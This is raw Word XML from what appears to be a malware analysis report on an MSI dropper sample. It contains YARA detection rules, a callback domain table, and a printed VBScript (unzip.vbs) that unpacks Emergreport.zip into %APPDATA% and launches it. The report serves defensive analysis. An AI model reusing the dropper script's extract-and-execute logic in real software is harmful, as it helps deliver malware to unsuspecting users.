            <wp:docPr id="9786533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A6383DC" w14:textId="77777777" w:rsidR="00617841" w:rsidRDefault="00617841" w:rsidP="0005795C">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75F583C4" w14:textId="77777777" w:rsidR="00617841" w:rsidRDefault="00617841" w:rsidP="0005795C">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FB433C9" w14:textId="77777777" w:rsidR="00617841" w:rsidRDefault="00617841" w:rsidP="0005795C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BCA123E" wp14:editId="22783FB4">
            <wp:extent cx="5943600" cy="1636395"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1902217118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7118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5E80AA8" w14:textId="77777777" w:rsidR="00617841" w:rsidRDefault="00617841" w:rsidP="0005795C">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01351426" w14:textId="0B7DFC91" w:rsidR="00F54E18" w:rsidRDefault="003B159A" w:rsidP="0005795C">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center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 w:rsidRPr="003B159A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B4F0A08" wp14:editId="6C93678B">
            <wp:extent cx="5943600" cy="1621155"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2104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2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E18">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="12789A7A" w14:textId="36E3A8B1" w:rsidR="00F54E18" w:rsidRDefault="00F54E18" w:rsidP="00F54E18">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc159205443"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Rules &amp; Signatures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="11DF4DF1" w14:textId="77777777" w:rsidR="00617841" w:rsidRDefault="00BD75A3">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">{Information on specific signatures, i.e. strings, URLs, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4766D95E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841">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCAA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>YARA_example</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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ADCE0E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BE0D4A" w14:textId="5389BD21" w:rsidR="00617841" w:rsidRPr="00617841" w:rsidRDefault="00617841" w:rsidP="005C14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description = </w:t>
      </w:r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"Unknown Dropper file"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418A7A4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424DC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strings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66BD13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"notely-setup-x64"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ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7061BD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25AD0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FolderName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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NoCapSoftware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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LLC"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ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3942BE85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"C__7DA1215618B34D02BA9B5645CE7646E4NOTELY.EXE|notely.exe"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ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5093CFCE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ProductVersionNoCapSoftwareManufacturerNoCapSoftware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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LLC"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ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5197E35B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String3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"unzip.vbs"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFA0BE0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ZIP_File</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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841">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Emergreport.zip"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ascii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="75A666D7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BC4377A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0F00F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condition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560D6C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IS_PE_filenameFILE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704DB4E2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FolderName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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and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String3</w:t>
      </w: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61784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617841">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ZIP_File</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="702146D6" w14:textId="77777777" w:rsidR="00617841" w:rsidRPr="00617841" w:rsidRDefault="00617841" w:rsidP="00617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76439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8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BCA882" w14:textId="77777777" w:rsidR="00617841" w:rsidRPr="00617841" w:rsidRDefault="00617841" w:rsidP="00617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B5110" w14:textId="01ED90F9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74D1FCFF" w14:textId="7A09061E" w:rsidR="00F54E18" w:rsidRDefault="00B81CF3" w:rsidP="00F54E18">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc159205444"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Appendices</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="10FAE74A" w14:textId="0487AA93" w:rsidR="00F54E18" w:rsidRDefault="00F54E18" w:rsidP="00F54E18"/>
    <w:p w14:paraId="63A76EB7" w14:textId="00C65E5A" w:rsidR="00F54E18" w:rsidRDefault="00F54E18" w:rsidP="006D6D92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc159205445"/>
      <w:r w:rsidRPr="00F54E18">
        <w:t>Yara Rules</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="45F54529" w14:textId="6D6B1B58" w:rsidR="00F54E18" w:rsidRDefault="00F54E18" w:rsidP="00F54E18"/>
    <w:p w14:paraId="031810C1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rule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Yara_Example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D4780F9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B2BA787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4C6B311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last_updated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"2021-10-15"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D088E4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author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"PMAT"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C205405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description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"A sample Yara rule for PMAT"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F43F858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9B081C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strings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F92E03C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color w:val="6272A4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>// Fill out identifying strings and other criteria</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B10AE8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$string1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"YOURETHEMANNOWDOG"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ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FC2717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$string2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"nim"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E74A221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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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PE_magic_byte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"MZ"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7CA0BB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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sus_hex_string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FF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E4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BD93F9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>??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00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1FA8C"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>FF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</w:p>
    <w:p w14:paraId="272F107C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9823E9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condition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EA68AB3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color w:val="6272A4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>// Fill out the conditions that must be met to identify the binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26239B78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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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PE_magic_byte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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at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</w:p>
    <w:p w14:paraId="3F10050A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        (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$string1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$string2</w:t>
      </w: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3D280B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</w:p>
    <w:p w14:paraId="649E1E2F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20F8CAD7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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D28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sus_hex_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="038A64D0" w14:textId="77777777" w:rsidR="003D280B" w:rsidRPr="003D280B" w:rsidRDefault="003D280B" w:rsidP="003D28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280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D6E3884" w14:textId="587ACCFC" w:rsidR="00F54E18" w:rsidRDefault="00F54E18" w:rsidP="00F54E18"/>
    <w:p w14:paraId="7A16BFC0" w14:textId="55C731A5" w:rsidR="00F54E18" w:rsidRDefault="00F54E18" w:rsidP="00F54E18"/>
    <w:p w14:paraId="55C85B62" w14:textId="0266B3A5" w:rsidR="00F54E18" w:rsidRDefault="00F54E18" w:rsidP="00F54E18"/>
    <w:p w14:paraId="2B34EC66" w14:textId="60B54671" w:rsidR="006D6D92" w:rsidRDefault="006D6D92" w:rsidP="00FC7CC2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc159205446"/>
      <w:r>
        <w:t>Callback URLs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="255C449B" w14:textId="5FC0A2D5" w:rsidR="003D280B" w:rsidRDefault="003D280B" w:rsidP="003D280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280B" w14:paraId="382CBEFC" w14:textId="77777777" w:rsidTr="003D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22D90" w14:textId="358AC30F" w:rsidR="003D280B" w:rsidRDefault="003D280B" w:rsidP="003D280B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18CAD3D1" w14:textId="1F650E22" w:rsidR="003D280B" w:rsidRDefault="003D280B" w:rsidP="003D2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</w:tr>
      <w:tr w:rsidR="003D280B" w14:paraId="00BB2F6D" w14:textId="77777777" w:rsidTr="003D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2F4A8" w14:textId="5EA0147B" w:rsidR="003D280B" w:rsidRDefault="005C14C4" w:rsidP="003D280B">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>consumerfinancereport.local</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49C0B3B6" w14:textId="4C08D96F" w:rsidR="003D280B" w:rsidRDefault="005C14C4" w:rsidP="003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C33ABE1" w14:textId="201EE9D6" w:rsidR="003D280B" w:rsidRDefault="003D280B" w:rsidP="003D280B"/>
    <w:p w14:paraId="5CFD6AAB" w14:textId="620DEFE9" w:rsidR="003D280B" w:rsidRDefault="003D280B" w:rsidP="003D280B"/>
    <w:p w14:paraId="79EACC50" w14:textId="77777777" w:rsidR="005C14C4" w:rsidRDefault="005C14C4" w:rsidP="003D280B"/>
    <w:p w14:paraId="6B2B6000" w14:textId="77777777" w:rsidR="005C14C4" w:rsidRDefault="005C14C4" w:rsidP="003D280B"/>
    <w:p w14:paraId="27969E65" w14:textId="77777777" w:rsidR="005C14C4" w:rsidRDefault="005C14C4" w:rsidP="003D280B"/>
    <w:p w14:paraId="442BDDA2" w14:textId="77777777" w:rsidR="005C14C4" w:rsidRDefault="005C14C4" w:rsidP="003D280B"/>
    <w:p w14:paraId="447C4E4D" w14:textId="77777777" w:rsidR="005C14C4" w:rsidRDefault="005C14C4" w:rsidP="003D280B"/>
    <w:p w14:paraId="4BB9A618" w14:textId="77777777" w:rsidR="003D280B" w:rsidRPr="003D280B" w:rsidRDefault="003D280B" w:rsidP="003D280B"/>
    <w:p w14:paraId="1DA3655B" w14:textId="3AE199D2" w:rsidR="00F54E18" w:rsidRDefault="005C14C4" w:rsidP="00F54E18">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc159205447"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Unzip.vbs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="1762A60C" w14:textId="77777777" w:rsidR="00D56CA3" w:rsidRDefault="00D56CA3" w:rsidP="003D280B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23EBE20F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ExtractFilesFromZip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pathToZipFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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,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dirToExtractFiles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C10BF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2B4B2D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fso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="37EFC461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Set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fso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CreateObject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Scripting.FileSystemObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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D9E93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C91F02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pathToZipFile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fso.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GetAbsolutePathName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pathToZipFile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B74CA5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dirToExtractFiles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fso.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GetAbsolutePathName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dirToExtractFiles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042344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EC9D2ED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(Not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fso.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FileExists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pathToZipFile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FADA52A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Exit Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A618A5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360C4A5C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8D6BCA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proofErr w:type="gram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fso.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FolderExists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dirToExtractFiles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C6CD8FC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Exit Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CD02A8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51EBA8F8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BE05F0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proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0CF6ABD8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set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CreateObject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Shell.Application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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2B4745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5A1F0D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zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5565E84C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Set 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sa.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NameSpace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pathToZipFile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D9CC0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C3563A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CFDF2B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Set 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sa.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NameSpace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dirToExtractFiles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11DE9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52A57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d.CopyHere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zip.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6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56C63C5F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06F084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Until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zip.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.Count</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B45AFED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Wscript.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62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AE4DF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629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34AB2DAF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0450FE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>End Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA3DF84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objWShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3FC28A1E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Set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objWShell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WScript.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CreateObject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WScript.Shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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97F76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appData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="29DB8E30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appData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objWShell.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expandEnvironmentStrings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"%APPDATA%"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EA8361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ExtractFilesFromZip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appData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"\Emergreport.zip"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appData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4DBF0611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objWShell.</w:t>
      </w:r>
      <w:r w:rsidRPr="0005062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"""%APPDATA%\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Emergreport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0005062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588E3F" w14:textId="77777777" w:rsidR="00D56CA3" w:rsidRPr="00050629" w:rsidRDefault="00D56CA3" w:rsidP="00D56C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Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00050629">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>objShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00050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506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Nothing</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D56CA3" w:rsidRPr="00050629" w:rsidSect="00760F63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0AC9" w14:textId="77777777" w:rsidR="00760F63" w:rsidRDefault="00760F63" w:rsidP="00635627">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="02A67A7E" w14:textId="77777777" w:rsidR="00760F63" w:rsidRDefault="00760F63" w:rsidP="006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BEB9" w14:textId="7633B055" w:rsidR="00635627" w:rsidRDefault="00635627" w:rsidP="00635627">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="right"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="31B17347" w14:textId="77777777" w:rsidR="00290930" w:rsidRDefault="00290930">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr>
        <w:rFonts w:ascii="Montserrat Medium" w:eastAsia="Times New Roman" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
        <w:color w:val="auto"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:pPr>
    <w:proofErr w:type="spellStart"/>
    <w:r w:rsidRPr="00290930">
      <w:rPr>
        <w:rFonts w:ascii="Montserrat Medium" w:eastAsia="Times New Roman" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
        <w:color w:val="auto"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t>Dropper.installer.msi.malz</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r w:rsidRPr="00290930">
      <w:rPr>
        <w:rFonts w:ascii="Montserrat Medium" w:eastAsia="Times New Roman" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
        <w:color w:val="auto"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="3915FE8B" w14:textId="31805238" w:rsidR="00635627" w:rsidRDefault="00290930" w:rsidP="00290930">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:t>Feb</w:t>
    </w:r>
    <w:r w:rsidR="00635627">
      <w:t xml:space="preserve"> 202</w:t>
    </w:r>
    <w:r>
      <w:t>4</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="7311B6FA" w14:textId="7F624CAE" w:rsidR="00635627" w:rsidRDefault="00635627">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:t>v1.0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44DE" w14:textId="77777777" w:rsidR="00760F63" w:rsidRDefault="00760F63" w:rsidP="00635627">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="34A35B92" w14:textId="77777777" w:rsidR="00760F63" w:rsidRDefault="00760F63" w:rsidP="006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B734" w14:textId="375FCBAA" w:rsidR="00635627" w:rsidRDefault="00480604" w:rsidP="00635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1DEE" wp14:editId="22AA0F54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705612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5CC6BC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1.8pt" to="555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" strokecolor="#4472c4 [3204]" strokeweight=".5pt">
              <v:stroke joinstyle="miter"/>
              <w10:wrap anchorx="margin"/>
            </v:line>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r w:rsidR="00635627">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EF4EE52" wp14:editId="6AE4FCA5">
          <wp:extent cx="822586" cy="732155"/>
          <wp:effectExtent l="0" t="0" r="0" b="0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948" cy="742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5C42C" w14:textId="1CC11C1A" w:rsidR="00480604" w:rsidRDefault="00480604" w:rsidP="006356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59F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="36445B42"/>
    <w:lvl w:ilvl="0" w:tplc="4496A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389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CB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822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60A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E63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96C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27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A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E35A78"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D990E896"/>
    <w:lvl w:ilvl="0" w:tplc="6E482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3C7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CEC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5C8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A2D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89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A85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89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4EE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BF3E21"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4C84FA2E"/>
    <w:lvl w:ilvl="0" w:tplc="5428D47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F2682"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F968B5F4"/>
    <w:lvl w:ilvl="0" w:tplc="1ABE5AF6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Franklin Gothic Book" w:cstheme="minorBidi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D35E9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="36888E32"/>
    <w:lvl w:ilvl="0" w:tplc="3A3EE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74A9D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94DAE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94F69"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="586ED6AE"/>
    <w:lvl w:ilvl="0" w:tplc="6A58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79DC7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BD588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BCD48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35D80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8C5AB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8E74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2D22E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856A9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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="58ED4124"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9CF2818C"/>
    <w:lvl w:ilvl="0" w:tplc="40487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AA4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FC7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2C1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41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D4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C20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56D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A6E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C2D013D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="426E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F0D74"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B8369146"/>
    <w:lvl w:ilvl="0" w:tplc="A816D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3A7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B85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3E6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8B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981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DE7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781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A5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91727AD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AE00EA14"/>
    <w:lvl w:ilvl="0" w:tplc="B46C2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382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CA4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E6F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EF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500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0A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F22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A4B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07844740">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="30813317">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="510069393">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1295260230">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1443306894">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1991639591">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1133401405">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="284117874">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="579675323">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1807165969">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="598487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7"/>
    <w:rsid w:val="0000714D"/>
    <w:rsid w:val="000129FC"/>
    <w:rsid w:val="00033B0B"/>
    <w:rsid w:val="00050629"/>
    <w:rsid w:val="0005795C"/>
    <w:rsid w:val="00072DA2"/>
    <w:rsid w:val="00124742"/>
    <w:rsid w:val="00136992"/>
    <w:rsid w:val="00175518"/>
    <w:rsid w:val="001B172A"/>
    <w:rsid w:val="001B1896"/>
    <w:rsid w:val="001F1D58"/>
    <w:rsid w:val="00200E09"/>
    <w:rsid w:val="00201CF7"/>
    <w:rsid w:val="00290930"/>
    <w:rsid w:val="002E356E"/>
    <w:rsid w:val="00324290"/>
    <w:rsid w:val="0039074F"/>
    <w:rsid w:val="003B159A"/>
    <w:rsid w:val="003B7272"/>
    <w:rsid w:val="003D280B"/>
    <w:rsid w:val="003E1DA1"/>
    <w:rsid w:val="00480604"/>
    <w:rsid w:val="00491543"/>
    <w:rsid w:val="004E000A"/>
    <w:rsid w:val="004F1E87"/>
    <w:rsid w:val="004F5C5F"/>
    <w:rsid w:val="00510367"/>
    <w:rsid w:val="00516D33"/>
    <w:rsid w:val="00551809"/>
    <w:rsid w:val="005C14C4"/>
    <w:rsid w:val="005D5761"/>
    <w:rsid w:val="005F08C6"/>
    <w:rsid w:val="00617841"/>
    <w:rsid w:val="00635627"/>
    <w:rsid w:val="00647EB0"/>
    <w:rsid w:val="00683CD5"/>
    <w:rsid w:val="006D50F4"/>
    <w:rsid w:val="006D6D92"/>
    <w:rsid w:val="00760F63"/>
    <w:rsid w:val="007F087F"/>
    <w:rsid w:val="007F67B0"/>
    <w:rsid w:val="007F6CBE"/>
    <w:rsid w:val="00811599"/>
    <w:rsid w:val="00870C14"/>
    <w:rsid w:val="008945B1"/>
    <w:rsid w:val="00942A2A"/>
    <w:rsid w:val="009B4982"/>
    <w:rsid w:val="009D598D"/>
    <w:rsid w:val="009E133A"/>
    <w:rsid w:val="00A262D7"/>
    <w:rsid w:val="00A26B88"/>
    <w:rsid w:val="00A34C41"/>
    <w:rsid w:val="00A515F3"/>
    <w:rsid w:val="00B81CF3"/>
    <w:rsid w:val="00B84E63"/>
    <w:rsid w:val="00BC6AF4"/>
    <w:rsid w:val="00BD75A3"/>
    <w:rsid w:val="00BF2764"/>
    <w:rsid w:val="00C424D4"/>
    <w:rsid w:val="00D347A0"/>
    <w:rsid w:val="00D56CA3"/>
    <w:rsid w:val="00E20896"/>
    <w:rsid w:val="00E32A25"/>
    <w:rsid w:val="00EA25BB"/>
    <w:rsid w:val="00F0342B"/>
    <w:rsid w:val="00F54E18"/>
    <w:rsid w:val="00FD5381"/>
    <w:rsid w:val="00FD61A8"/>
    <w:rsid w:val="00FF0789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1E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BE"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book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96"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="120"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Montserrat Medium" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium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18"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr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96"/>
    <w:rPr>
      <w:rFonts w:ascii="Montserrat Medium" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium" w:cstheme="majorBid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56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5627"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="10070"/>
      </w:tabs>
      <w:spacing w:after="40"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="auto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5627"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:color w:val="auto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5627"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="10070"/>
      </w:tabs>
      <w:spacing w:after="60"/>
      <w:ind w:left="403"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:color w:val="auto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E18"/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E87"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00E3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9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4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2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raf">
    <w:name w:val="graf"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00647E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27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074F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="0039074F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5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8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ustomXml" Target="ink/ink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customXml" Target="ink/ink1.xml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customXml" Target="ink/ink3.xml"/><Relationship Id="rId36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4.xm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CDC70A-D13A-4143-AE54-324F7A0EE539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258744-440A-4C9B-8BC5-3F3EF92E8BF2}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
